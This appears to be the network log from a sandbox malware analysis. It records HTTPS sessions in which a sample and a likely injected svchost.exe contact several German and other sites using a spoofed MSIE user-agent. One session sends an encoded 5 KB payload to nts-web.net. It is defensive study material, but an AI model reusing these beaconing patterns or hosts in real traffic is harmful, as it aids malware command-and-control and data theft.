                                                                                                                                                                                                                                                                        2023-03-10 06:56:25 UTC1735INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20
                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        12192.168.2.652655185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC149OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: techtrans.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC159INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:14 GMT
                                                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                        Expires: 0
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                                                                                                        Connection: Upgrade, close
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC159INData Raw: 32 64 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 2f 68 65 61 64 3e 3c
                                                                                                                                                                                                                                                                        Data Ascii: 2de<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        120192.168.2.661361138.201.65.187443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:25 UTC1735OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: www.diamir.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:25 UTC1736INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:25 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Content-Length: 548
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                        2023-03-10 06:56:25 UTC1736INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20
                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        121192.168.2.661347185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:25 UTC1736OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: techtrans.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:25 UTC1742INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:25 GMT
                                                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                        Expires: 0
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                                                                                                        Connection: Upgrade, close
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        2023-03-10 06:56:25 UTC1742INData Raw: 32 64 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 2f 68 65 61 64 3e 3c
                                                                                                                                                                                                                                                                        Data Ascii: 2de<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        122192.168.2.66109849.212.235.175443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:25 UTC1736OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: nts-web.net
                                                                                                                                                                                                                                                                        Content-Length: 5076
                                                                                                                                                                                                                                                                        2023-03-10 06:56:25 UTC1737OUTData Raw: 7a 4a 55 35 71 70 4f 63 6f 4b 53 6e 71 71 79 76 73 72 57 34 75 37 37 42 78 63 68 6c 51 77 2f 6a 35 33 33 70 4d 6b 58 58 74 5a 4a 62 47 6f 6c 36 69 38 35 37 62 35 31 6a 67 4e 6e 6e 4d 47 49 70 50 2f 42 52 42 4f 73 57 30 75 4b 51 4b 30 4e 5a 32 68 77 58 59 78 6b 76 2f 30 4f 74 4c 4e 48 35 4c 4a 64 43 65 32 71 69 54 4c 30 33 4d 4e 37 49 6a 71 51 4f 47 79 57 38 75 31 58 44 6f 63 4c 74 41 45 44 75 41 4b 73 57 6c 4c 34 32 66 6b 7a 4c 4e 5a 69 66 66 79 30 72 39 53 5a 4d 59 78 77 50 46 49 30 34 6e 69 43 4f 72 43 64 64 6f 44 65 4f 50 6f 78 4e 44 51 74 5a 30 47 2f 57 2f 48 43 6c 4b 74 2f 59 70 6e 6a 6a 64 59 74 61 61 61 59 52 34 68 41 4d 4c 6f 70 70 69 35 48 56 63 74 35 36 51 69 58 48 6c 57 6a 6c 58 61 6e 42 51 37 7a 6e 76 6c 65 63 4d 63 6b 63 6d 79 44 63 74 63 62
                                                                                                                                                                                                                                                                        Data Ascii: zJU5qpOcoKSnqqyvsrW4u77BxchlQw/j533pMkXXtZJbGol6i857b51jgNnnMGIpP/BRBOsW0uKQK0NZ2hwXYxkv/0OtLNH5LJdCe2qiTL03MN7IjqQOGyW8u1XDocLtAEDuAKsWlL42fkzLNZiffy0r9SZMYxwPFI04niCOrCddoDeOPoxNDQtZ0G/W/HClKt/YpnjjdYtaaaYR4hAMLoppi5HVct56QiXHlWjlXanBQ7znvlecMckcmyDctcb


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        123192.168.2.661476185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:26 UTC1743OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: techtrans.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:26 UTC1743INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:26 GMT
                                                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                        Expires: 0
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                                                                                                        Connection: Upgrade, close
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        2023-03-10 06:56:26 UTC1743INData Raw: 32 64 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 2f 68 65 61 64 3e 3c
                                                                                                                                                                                                                                                                        Data Ascii: 2de<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        124192.168.2.6616155.189.171.125443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:26 UTC1744OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: www.muhr-soehne.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:26 UTC1744INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:26 GMT
                                                                                                                                                                                                                                                                        Server: Apache/2.4.38 (Debian)
                                                                                                                                                                                                                                                                        Last-Modified: Thu, 02 Mar 2023 15:05:19 GMT
                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                        Content-Length: 51841
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                        2023-03-10 06:56:26 UTC1744INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 64 65 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 21 2d 2d 20 0a 09 6d 61 64 65 20 62 79 20 50 53 56 6e 65 6f 0a 0a 09 54 68 69 73 20 77 65 62 73 69 74 65 20 69 73 20 70 6f 77 65 72 65 64 20 62 79 20 54 59 50 4f 33 20 2d 20 69 6e 73 70 69 72 69 6e 67 20 70 65 6f 70 6c 65 20 74 6f 20 73 68 61 72 65 21 0a 09 54 59 50 4f 33 20 69 73 20 61 20 66 72 65 65 20 6f 70 65 6e 20 73 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 20 46 72 61 6d 65 77 6f 72 6b 20 69 6e 69 74 69 61 6c 6c 79 20 63 72 65 61 74 65 64 20 62 79 20 4b 61 73 70 65 72 20 53 6b 61 61 72 68 6f 6a 20
                                                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html dir="ltr" lang="de"><head><meta charset="utf-8">... made by PSVneoThis website is powered by TYPO3 - inspiring people to share!TYPO3 is a free open source Content Management Framework initially created by Kasper Skaarhoj
                                                                                                                                                                                                                                                                        2023-03-10 06:56:26 UTC1760INData Raw: 20 20 20 20 20 20 20 56 65 72 73 63 68 6c 69 65 c3 9f 6d 61 73 63 68 69 6e 65 6e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 20 6c 61 79 6f 75 74 2d 30 20 20 22 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 76 65 72 73 63 68 6c 69 65
                                                                                                                                                                                                                                                                        Data Ascii: Verschliemaschinen </a> </li> <li class="nav-item layout-0 "> <a href="/verschlie
                                                                                                                                                                                                                                                                        2023-03-10 06:56:26 UTC1776INData Raw: 66 72 61 6d 65 2d 6c 61 79 6f 75 74 2d 30 20 20 20 6d 74 2d 30 20 6d 62 2d 30 0a 20 20 20 20 0a 0a 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 6c 2d 33 20 63 6f 6c 2d 6c 67 2d 36 20 63 6f 6c 2d 6d 64 2d 36 20 63 6f 6c 2d 73 6d 2d 31 32 20 63 6f 6c 2d 31 32 20 6d 79 2d 34 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 65 72 76 69 63 65 62 6f 78 20 68 2d 31 30 30 20 62 67 2d 6c 69 67 68 74 2d 67 72 65 79 20 64 2d 66 6c 65 78 20 66 6c 65 78 2d 63 6f 6c 75 6d 6e 20 68 2d 31 30 30 20 77 2d 31 30 30 20 70 2d 33 20 22 3e 0a
                                                                                                                                                                                                                                                                        Data Ascii: frame-layout-0 mt-0 mb-0 "> <div class="row"> <div class="col-xl-3 col-lg-6 col-md-6 col-sm-12 col-12 my-4"> <div class="servicebox h-100 bg-light-grey d-flex flex-column h-100 w-100 p-3 ">
                                                                                                                                                                                                                                                                        2023-03-10 06:56:26 UTC1792INData Raw: 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 2d 63 65 6e 74 65 72 20 6d 79 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 78 2d 30 20 6d 78 2d 6d 64 2d 35 20 6d 79 2d 32 20 6d 79 2d 6d 64 2d 30 22 20 69 74 65 6d 70 72 6f 70 3d 22 69 74 65 6d 4c 69 73 74 45 6c 65 6d 65 6e 74 22 20 69 74 65 6d 73 63 6f 70 65 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 4c 69 73 74 49 74 65 6d 22 20 61 72 69 61 2d 63 75 72 72 65 6e 74 3d 22 70 61 67 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72
                                                                                                                                                                                                                                                                        Data Ascii: justify-content-center my-3"> <li class="mx-0 mx-md-5 my-2 my-md-0" itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem" aria-current="page"> <a hr


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        125192.168.2.661712188.114.96.3443C:\Users\user\Desktop\iJzpyjAehB.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:26 UTC1795OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: hyab.se
                                                                                                                                                                                                                                                                        2023-03-10 06:56:26 UTC1796INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:26 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Location: https://hyab.com
                                                                                                                                                                                                                                                                        Cache-Control: max-age=600
                                                                                                                                                                                                                                                                        Expires: Fri, 10 Mar 2023 07:06:26 GMT
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lDCrNpb8mTuUpDvRDkd6MXXC4P%2F%2BNMg29XmM5llxDFoG34KP9AsArvhMI8sDaxWr9%2BLHIg7H0TkTeVsZgBETFMfkma60%2FHROfWLX2JSP9seSurFRz2C3ynVc"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 7a59a864d95430cc-FRA
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                        2023-03-10 06:56:26 UTC1797INData Raw: 63 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 79 61 62 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: c8<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://hyab.com">here</a>.</p></body></html>
                                                                                                                                                                                                                                                                        2023-03-10 06:56:26 UTC1797INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        126192.168.2.661722172.67.156.49443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:26 UTC1795OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: orlyhotel.com
                                                                                                                                                                                                                                                                        Cookie: django_language=en
                                                                                                                                                                                                                                                                        2023-03-10 06:56:26 UTC1852INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:26 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Cache-Control: max-age=0, no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Expires: Fri, 10 Mar 2023 06:46:30 GMT
                                                                                                                                                                                                                                                                        Content-Language: en
                                                                                                                                                                                                                                                                        Last-Modified: Fri, 10 Mar 2023 06:46:30 GMT
                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                        Vary: Accept-Language
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TJEBPkMuCRWInZjJTsnRMwHKKRBWiRyCo0lhzSq2zoN%2FxxH3vULhZILuAlYyl0WYCAnWOot5YzqDZR0q%2BHK%2Fqb7HphOlzYAcQUVDFvtv3C46vs9VGYa1IkOWwdVmqb2r"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 7a59a864e95f3631-FRA
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                        2023-03-10 06:56:26 UTC1853INData Raw: 31 62 0d 0a 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 20 28 35 30 30 29 3c 2f 68 31 3e 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 1b<h1>Server Error (500)</h1>
                                                                                                                                                                                                                                                                        2023-03-10 06:56:26 UTC1853INData Raw: 30 0d 0a 0d 0a
